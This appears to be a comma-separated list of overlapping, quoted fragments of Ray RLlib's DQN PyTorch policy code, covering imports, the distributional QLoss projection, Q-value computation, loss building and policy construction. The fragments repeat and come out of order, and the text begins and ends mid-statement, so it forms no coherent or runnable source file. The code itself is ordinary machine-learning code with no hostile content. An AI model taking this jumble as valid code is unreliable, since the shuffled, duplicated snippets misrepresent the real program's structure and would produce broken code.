v_min=-10.0,", "we know were selected in the given state. one_hot_selection =", "ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import", "num_atoms) l_project = F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms) u_project", "+ support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value = torch.sum(z *", "torch.clamp(r_tau, v_min, v_max) b = (r_tau - v_min) / ((v_max", "= (r_tau - v_min) / ((v_max - v_min) / float(num_atoms", "which we know were selected in the given state. one_hot_selection", "1) value = state_score + advantages_centered else: value = action_scores", "q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked # compute the", "best possible value starting from state at t + 1", "model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], #", "num_atoms) r_tau = torch.unsqueeze( rewards, -1) + gamma**n_step * torch.unsqueeze(", "torch.unsqueeze( advantages_mean, 1) value = state_score + advantages_centered else: value", "grads if configured. return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy,", "} else: q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best #", "add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy:", "# Q-network evaluation. q_t, q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model,", "t + 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net =", "most implementations # when b happens to be an integer,", "action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space,", "generically into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise)", "compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1)", "possible value starting from state at t + 1 if", "softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn = try_import_torch()", "= F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1,", "paper claims that using this cross entropy loss for #", "return policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return", "= False): config = policy.config model_out, state = model({ SampleBatch.CUR_OBS:", "q_probs_tp1_best * (ub - b + floor_equal_ceil) mu_delta = q_probs_tp1_best", "get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch: TensorType, *, explore: bool", "from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error", "`prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error *", "compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network evaluation.", "compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores for", "config = policy.config model_out, state = model({ SampleBatch.CUR_OBS: obs, \"is_training\":", "after each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars =", "(action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out)", "lb = torch.floor(b) ub = torch.ceil(b) # Indispensable judgement which", "q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1,", "__init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1,", "= False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy,", "SampleBatch) -> TensorType: config = policy.config # Q-network evaluation. q_t,", "and insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss", "import Dict, List, Tuple import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy", "postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from", "which is missed in most implementations # when b happens", "= importance_weights # Do forward pass on loss to update", "= F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN, q_t,", "huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected),", "SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from", "given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t", "= QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"],", "logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out)", "config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out)", "None, input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy:", "value starting from state at t + 1 if config[\"double_q\"]:", "torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best", "policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2,", "policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network evaluation. q_tp1,", "robust and insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m)", "-> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space,", "train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net,", "gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms > 1: #", "raise UnsupportedSpaceException( \"Action space {} is not supported for DQN.\".format(action_space))", "build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error def", "= compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network", "input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy: Policy,", "= torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze(", "+ 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values(", "corresponds to an entropy loss z = torch.range(0.0, num_atoms -", "None if nn: F = nn.functional class QLoss: def __init__(self,", "> FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected =", "LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space,", "pr_j(s', a*) will # be discarded because (ub-b) == (b-lb)", "pass on loss to update td error attribute build_q_losses(self, self.model,", "256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else:", "Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]: # Clip", "from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model", "Move target net to device (this is done autoatically for", "return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG,", "(batch_size, 1) * (1, num_atoms) = (batch_size, num_atoms) r_tau =", "q_tp1_best # compute RHS of bellman equation q_t_selected_target = rewards", "b + floor_equal_ceil) mu_delta = q_probs_tp1_best * (b - lb)", "obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1", "nn: F = nn.functional class QLoss: def __init__(self, q_t_selected, q_logits_t_selected,", "not supported for DQN.\".format(action_space)) if config[\"hiddens\"]: # try to infer", "( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model", "one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1)", "torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best", "UnsupportedSpaceException( \"Action space {} is not supported for DQN.\".format(action_space)) if", "gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not", "evaluation. q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False,", "q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN,", "= torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action)", "b happens to be an integer, lb == ub, so", "# be discarded because (ub-b) == (b-lb) == 0. floor_equal_ceil", "try_import_torch() F = None if nn: F = nn.functional class", "1: # Distributional Q-learning which corresponds to an entropy loss", "None) if config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action, logits, probs_or_logits)", "size, otherwise fall back to 256 num_outputs = ([256] +", "import TensorType, TrainerConfigDict torch, nn = try_import_torch() F = None", "TensorType: config = policy.config # Q-network evaluation. q_t, q_logits_t, q_probs_t", "import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict", "autoatically for the # policy.model, but not for any other", "isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model =", "l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum( u_project *", "= model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [], None) if", "( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from", "+ gamma**n_step * torch.unsqueeze( 1.0 - done_mask, -1) * torch.unsqueeze(z,", "torch.mean(self.td_error * importance_weights) self.stats = { # TODO: better Q", "(this is done autoatically for the # policy.model, but not", "if configured. return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict,", "return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches, model,", "state_batches, model, action_dist) -> Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy", "priority is robust and insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits(", "self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error * importance_weights)", "= compute_q_values(policy, model, obs_batch, explore, is_training) q_vals = q_vals[0] if", "q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1,", "ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import", "= compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space: gym.Space,", "ModelV2, obs_batch: TensorType, *, explore: bool = True, is_training: bool", "is_training) q_vals = q_vals[0] if isinstance(q_vals, tuple) else q_vals policy.q_values", "q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate of best", "= rewards + gamma**n_step * q_tp1_best_masked # compute the error", "policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection", "policy.model, but not for any other models the policy has).", "== ub, so pr_j(s', a*) will # be discarded because", "__init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict =", "> 1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = (", "action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"],", "config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict) ->", "TODO: better Q stats for dist dqn \"mean_td_error\": torch.mean(self.td_error), }", "v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option to add LayerNorm", "def build_q_losses(policy: Policy, model, _, train_batch: SampleBatch) -> TensorType: config", "build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr,", "= support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores", "framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"],", "> 1: # Distributional Q-learning which corresponds to an entropy", "dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action =", "= (batch_size, num_atoms) r_tau = torch.unsqueeze( rewards, -1) + gamma**n_step", "Policy, obs_space, action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"])", "= v_min + z * (v_max - v_min) / float(num_atoms", "this cross entropy loss for # priority is robust and", "None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space,", "explore, is_training: bool = False): config = policy.config model_out, state", "but not for any other models the policy has). policy.target_q_model", "policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE,", "compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t})", "\"Action space {} is not supported for DQN.\".format(action_space)) if config[\"hiddens\"]:", "model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1)", "= support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1)", "probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"]", "probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str,", "TensorType) -> Dict[str, TensorType]: # Clip grads if configured. return", "Dict[str, TensorType]: # Clip grads if configured. return apply_grad_clipping(policy, optimizer,", "apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from", "update td error attribute build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error", "policy: Policy, model: ModelV2, obs_batch: TensorType, *, explore: bool =", "}, [], None) if config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action,", "judgement which is missed in most implementations # when b", "Q stats for dist dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked", "config) # Move target net to device (this is done", "(batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best", "support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered", "+ gamma**n_step * q_tp1_best_masked # compute the error (potentially clipped)", "q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best # compute RHS", "torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate of", "1)) lb = torch.floor(b) ub = torch.ceil(b) # Indispensable judgement", "support_prob_per_action = nn.functional.softmax( support_logits_per_action) value = torch.sum(z * support_prob_per_action, dim=-1)", "td error attribute build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error", "Move option to add LayerNorm after each Dense # generically", "from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2", "target net to device (this is done autoatically for the", "for the # policy.model, but not for any other models", "tuple) else q_vals policy.q_values = q_vals return policy.q_values, TorchCategorical, []", "Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy:", "which corresponds to an entropy loss z = torch.range(0.0, num_atoms", "else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores - torch.unsqueeze(", "equation q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked # compute", "= torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate", "1: (action_scores, z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores,", "\"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space, action_space, config:", "extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[ TargetNetworkMixin,", "LayerNorm after each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars", "torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered", "* one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1),", "input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES]", "bool = False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals =", "z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits)", "q_t, q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True)", "F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN,", "input_dict, state_batches, model, action_dist) -> Dict[str, TensorType]: return {\"q_values\": policy.q_values}", "reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn =", "= act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] =", "z = v_min + z * (v_max - v_min) /", "-> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action", "Policy, model: ModelV2, obs: TensorType, explore, is_training: bool = False):", "q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected,", "z * (v_max - v_min) / float(num_atoms - 1) #", "policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network evaluation. q_tp1, q_logits_tp1,", "model: ModelV2, obs_batch: TensorType, *, explore: bool = True, is_training:", "explore=False, is_training=True) # Q scores for actions which we know", "q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"],", "huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn", "ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"]", "dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value = torch.sum(z", "False): config = policy.config model_out, state = model({ SampleBatch.CUR_OBS: obs,", "grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]: #", "(ub-b) == (b-lb) == 0. floor_equal_ceil = (ub - lb", "# TODO: better Q stats for dist dqn \"mean_td_error\": torch.mean(self.td_error),", "* (b - lb) ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta,", "= done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do forward pass on", "# generically into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None),", "that using this cross entropy loss for # priority is", "done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do forward pass on loss", "one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN,", "TensorType]: return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy,", "policy.config model_out, state = model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, },", "q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss =", "= q_vals return policy.q_values, TorchCategorical, [] # state-out def build_q_losses(policy:", "# Distributional Q-learning which corresponds to an entropy loss z", "v_min) / float(num_atoms - 1)) lb = torch.floor(b) ub =", "import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import", "0. floor_equal_ceil = (ub - lb < 0.5).float() # (batch_size,", "torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n)", "support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean", "state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean(", "(v_max - v_min) / float(num_atoms - 1) # (batch_size, 1)", "torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate of best possible value", "each Dense # generically into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy,", "not for any other models the policy has). policy.target_q_model =", "model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1:", "== (b-lb) == 0. floor_equal_ceil = (ub - lb <", "torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta + mu_delta # Rainbow", "TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move target net to device", "input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS]", "infer the last layer size, otherwise fall back to 256", "build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) ->", "if isinstance(q_vals, tuple) else q_vals policy.q_values = q_vals return policy.q_values,", "bool = False): config = policy.config model_out, state = model({", "state_score, dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value =", "q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) #", "ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import", "class ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask,", "policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores for actions which", "to be an integer, lb == ub, so pr_j(s', a*)", "+ mu_delta # Rainbow paper claims that using this cross", "- v_min) / float(num_atoms - 1) # (batch_size, 1) *", "evaluation. q_t, q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False,", "model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score", "attribute build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error", "stats for dist dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked =", "else: value = action_scores return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy:", "each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables()", "self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space:", "q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) *", "the last layer size, otherwise fall back to 256 num_outputs", "ub = torch.ceil(b) # Indispensable judgement which is missed in", "class QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards,", "config[\"hiddens\"]: # try to infer the last layer size, otherwise", "ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta =", "is_training=True) # Q scores for actions which we know were", "Rainbow paper claims that using this cross entropy loss for", "Do forward pass on loss to update td error attribute", "config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise", "LayerNorm after each Dense # generically into ModelCatalog. add_layer_norm =", "= compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores", "from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist", "num_atoms) = (batch_size, num_atoms) r_tau = torch.unsqueeze( rewards, -1) +", "* q_tp1_best # compute RHS of bellman equation q_t_selected_target =", "Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]:", "= policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model:", "\"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]: # Clip grads if", "(FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch,", "([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs = action_space.n", "# Do forward pass on loss to update td error", "from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template", "DQN.\".format(action_space)) if config[\"hiddens\"]: # try to infer the last layer", "to device (this is done autoatically for the # policy.model,", "loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist) -> Dict[str,", "# when b happens to be an integer, lb ==", "policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"],", "error (potentially clipped) self.td_error = q_t_selected - q_t_selected_target.detach() self.loss =", "support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1)", "} class ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1,", "ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import", "policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(),", "at t + 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net", "config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy,", "ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from 